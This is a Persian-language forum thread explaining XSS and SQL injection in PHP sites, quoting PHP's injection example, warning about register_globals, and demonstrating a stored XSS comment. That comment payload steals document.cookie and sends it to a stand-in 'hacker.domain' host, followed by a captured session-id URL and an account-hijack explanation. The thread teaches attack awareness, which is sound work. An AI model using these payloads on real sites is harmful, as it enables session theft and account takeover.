Xss چیست؟ و راههای مقابله با آن

نقل قول:

---

نوشته شده توسط dogtag [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

من این وسط هیچ کاره ام و چاکر همه
ولی این دو تا چه فرقی می کنند؟

خب وقتی شما یه می خوای inject کنی، از فرم استفاده می کنی. که اون هم با url فرقی نداره (چه post و چه get) حالا بماند که با فایل فلش هم میشه



میشه این رو توضیح بدی؟
خب وقتی که به دیتابیس وصل بشه، دیگه javascript کاری نمی تونه بکنه، اونجا حملات sql injection وجود داره که برای اون هم تابع آماده موجوده

---

مثال توی خود سایت php با یکمی نغییر :
An example SQL Injection Attack
[php]<?php
// Query database to check if there are any matching users
$query = "SELECT * FROM users WHERE user='{$_POST['username']}' AND password='{$_POST['password']}'";
mysql_query($query);

// We didn't check $_POST['password'], it could be anything the user wanted! For example:
$_POST['username'] = 'aidan';
$_POST['password'] = "x1' OR password='x2' OR password='x3";

// This means the query sent to MySQL would be:
echo $query;
?>[/php]

کد:

---

SELECT * FROM users WHERE user='aidan' AND password='x1' OR password='x2' OR password='x3'

---

اینجا فقط می گرده و چند تا یا چند صد هزار تا پسورد رو چک می کنه, اما شما فکر کن که بیاد و با همین روش یه جدول یا کل دیتابیست رو پاک کنه...

راستی یه نکته:
خیلی از برنامه نویسای تازه کار میرن و از php.ini مقدار register_globals رو آن می کنن (حتی بعضی کتاب های آموزش php هم به اینکار توصیه می کنن) و مثلا" بجای $_GET['var'] یا $_POST['var']از $var استفاده می کنند و همین موضوع می تونه به راحتی موجب هک شدن سایت بشه, خود سایت php هم تاکید بسیار داره که کاربران register_globals رو آن نکنن و می خواد در ورژن های آینده به کل این register_globals رو برداره (طی آخرین اخبار هوای امروز کشورمان ... :دی)

نقل قول:

---

نوشته شده توسط pezhman32 [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

راستی یه نکته:
خیلی از برنامه نویسای تازه کار میرن و از php.ini مقدار register_globals رو آن می کنن (حتی بعضی کتاب های آموزش php هم به اینکار توصیه می کنن) و مثلا" بجای $_GET['var'] یا $_POST['var']از $var استفاده می کنند و همین موضوع می تونه به راحتی موجب هک شدن سایت بشه, خود سایت php هم تاکید بسیار داره که کاربران register_globals رو آن نکنن و می خواد در ورژن های آینده به کل این register_globals رو برداره (طی آخرین اخبار هوای امروز کشورمان ... :دی)

---

کاملا درسته
همیشه باید دقت کنید به

register global
magic quata
safe mode

با اجازه تون من talk رو دوباره بگیرم دستم:
تو پست 19 مثالی بود (میشه یه کم بد صحبت کنم؟ آخه باعث قدرت گرفتم حرفم میشه، لطفاً ناراحت نشید)
همین کار رو با post هم میشه کرد
کافیه این رو تو 1 صفحه ی html ذخیره کنید و روی کامپیوترتون اجرا کنید:
[HTML]<form method="post" action="www.folan.com/x.php">
<input name="n" type="text" value="کدهای نفوذ و اینجکت" />
<input value="---- iT!" type="submit" />
</form>[/HTML]

دقیقاً شد همون کار بالا با متد post

نقل قول:

---

راستی یه نکته:
خیلی از برنامه نویسای تازه کار میرن و ...

---

عزیز دل برادر، این راه ها هیچکدوم باعث نمیشه که کارت خراب شه.
قدرت برنامه نویسی رو دست کم نگیر.
این مشکلات فقط در اولین و دومین کارت دیده میشه و از اون به بعد دیگه دستت راه می افته و بدون bug می نویسی



ببخشید که تند حرف زدم، خودم رو نمی بخشم :دی

نقل قول:

---

نوشته شده توسط dogtag [ برای مشاهده لینک ، با نام کاربری خود وارد شوید یا ثبت نام کنید ]

با اجازه تون من talk رو دوباره بگیرم دستم:
تو پست 19 مثالی بود (میشه یه کم بد صحبت کنم؟ آخه باعث قدرت گرفتم حرفم میشه، لطفاً ناراحت نشید)
همین کار رو با post هم میشه کرد
کافیه این رو تو 1 صفحه ی html ذخیره کنید و روی کامپیوترتون اجرا کنید:
[html]<form method="post" action="www.folan.com/x.php">
<input name="n" type="text" value="کدهای نفوذ و اینجکت" />
<input value="---- iT!" type="submit" />
</form>[/html]دقیقاً شد همون کار بالا با متد post






عزیز دل برادر، این راه ها هیچکدوم باعث نمیشه که کارت خراب شه.
قدرت برنامه نویسی رو دست کم نگیر.
این مشکلات فقط در اولین و دومین کارت دیده میشه و از اون به بعد دیگه دستت راه می افته و بدون bug می نویسی



ببخشید که تند حرف زدم، خودم رو نمی بخشم :دی

---

البته احتمالا" اولین کار که نه وقتی اولین بار سایتت هک شد از اونجا به بعد سعی می کنی بدون باگ بنویسی. نمی دونم چه حرف بدی زدم که می گی قدرت برنامه نویسی رو دست کم نگیر
کجا تند حرف زدی؟! نکنه تیکه انداختی و ما نفهمیدیم؟! :دی

منظورم این بود که انقدر برنامه نویسی امن هست که نشه به این راحتی ها هک کرد
تا برنامه نویسی سوتی نده، کاری از دست هکر بر نمیاد

اصلا من چی گفتم شما چی گفتی

من داشتم از بعد هکری قضیه رو نگاه میکردم شما از یه جای دیگه

من منظروم لوگهایی هست که به جا خواهد ماند در پست بعدی تفاوت اون دو تا هم نوشتم

چرا از دیشب تا حالا این تاپیک اینقدر منحرف شده؟
تو بیشتر مثالها دارید از SQL Injection صحبت میکنید.
بابا اصلاً بحث سر POST و GET نیست. بحث چیز دیگه ایه.
من که این تاپیکو دیدم هنگ کردم نمیدونم چی بگم!

بزارید با یه مقدمه کوچولو در مورد کوکی ها شروع کنم. البته چیزایی رو که میخوام بگم همه میدونن ولی برای روشن شدن بحث لازمه.
میدونید که مرورگر کوکیهایی رو که برای یه سایت ست کرده دست هر کسی نمیده. مثلاً کوکی هایی که برای سایت yahoo.com تو یه مرورگر ایجاد شده فقط برای سایت yahoo.com قابل دسترسیه و گوگل نمیتونه اونا رو بخونه. (البته در مورد امنیت کوکی ها نمیخوام بحث کنیم)
برای اینکه یه هکر بتونه کوکی های سایت مورد نظرش رو از یه کاربر بگیره باید اسکرپتشو از توی همون دامنه اجرا کنه.
برای روشن شدن قضیه کد زیر رو تو یه فایل html ذخیره کنید و تو چند تا دامنه (تو لوکال هاست) اجرا کنید تا کوکی های اون دامنه رو برایتون نمایش بده:
[html]
<html>
<body>
<script>
alert('کوکی های این دامنه: \n' + document.cookie);
</script>
</body>
</html>
[/html]
همونطوری که خواهید دید نتیجه نمایش برای دامنه های مختلف یکی نیست (اگر کوکی مربوط به آن دامنه در مرورگر موجود باشه).

حالا بریم سر اصل قضیه: XSS

فرض کنید ما تو سایتمون یه فرم نظر سنجی داریم که نظر کاربران رو میگیره و همونطوری که هست نشون میده. متن فرم هم مهم نیست که GET باشه یا POST. فرقی هم نمیکنه که مطالب فرم کجا ذخیره بشه. تو دیتابیس یا تو فایل تفاوتی نداره.
خوب دیگه، یه هکر چیز زیادی لازم نداره. همینقدر که مطالبش رو بدون تصفیه کردن نمایش بدیم براش کافیه.
هکر کافیه بیاد این کد رو به جای نظر خودش ارسال کنه:
[html]
سلام
<script>
alert('کوکی های این دامنه: \n' + document.cookie);
window.location = 'http://hacker.domain/getCookie?cookie='+document.cookie;
</script>
من کوکی های سایت شما رو دزدیدم!
[/html]

حالا به محض اینکه هر بازدید کننده ای از صفحه ای که بازدید کنه که اون کد رو نمایش میده به سایت هکر ریدایرکت میشه که کوکی های مربوط به اون دامنه رو از مرورگر بازدید کننده میگیره و تقدیم هکر میکنه. مثلاً وقتی من تو لوکال آزمایش کردم به این آدرس ریدایرکت شد:

کد:

---

http://hacker.domain/getCookie?cookie=neopersia_sid=862ccf9b7571d4f07f5251e874afcdad

---

همونطور که میبینید شناسه سشن مربوط به دامنه که توی کوکی ها ذخیره شده بود به هکر ارسال شد!
حالا تنها کاری که هکر لازمه انجام بده اینه که یه شناسه مثل همونی که دریافت کرده برای مرورگرش ست کنه و بدون اینکه نیازی به لوگین کردن داشته باشه به حساب کاربری من وارد شه! از اونجا هم میتونه اطلاعات منو برداره یا اینکه کلمه عبورمو عوض کنه...

مثالی که زدم خیلی تابلو بود :31: ولی هکر میتونه جوری اطلاعات رو بدزده که کاربر متوجه نشه. مثلاً میتونه با Ajax اطلاعاتش رو بفرسته بدون اینکه صفحه اصلی ریدایرکت بشه!

---------------------------------------
تا اینجا امیدوارم متوجه شده باشید که منظور ما کدوم نوع از حمله هست و فرقش با SQL Injection چی هست.
الان یه کم سرم شلوغه ایشالله تو اولین فرصت در مورد راه حلش هم بحث میکنیم.
شما هم نشینید هی سر صورت مسئله بحث کنید. بری سراغ راه حلها دیگه :31:

من یه تابع کوچیک نوشتم و خودم یه دو سالی هست استفاده می کنم و مشکلی نداشتم تاحالا. باید مقادیری که کاربر در پایگاه داده ها ثبت کرده رو به عنوان ورودی به این تابع بدی و خروجی پاک رو تحویل بگیری:

کد:

---

http://pezhman32.persiangig.ir/New%20Text%20Document%20(2).txt

---

دلیل اینکه این کد رو اینجا نزاشتم باگ وی بی یود که خوب انکد نم کنه (نمی دونم این همه باگ اونم از این همه برنامه نویس حرفه ای)
درضمن همه چیز هم کوکی نیست
یه بار یه سایت هک شده رو دیدم که توش یه فریم پست شده بود و اون فریم به یه سایتی لینک شده بود که نمی دونم دقیقا" از activeX استفاده می کرد یا چیز دیگه ای ولی وقتی با ie بازش می کردی ویندوزت فاتحش خونده میشد, من خودم با هیچ antispy و آنتی ویروسی نتونستم درستش کنم و مجبور شدم وین عوض کنم.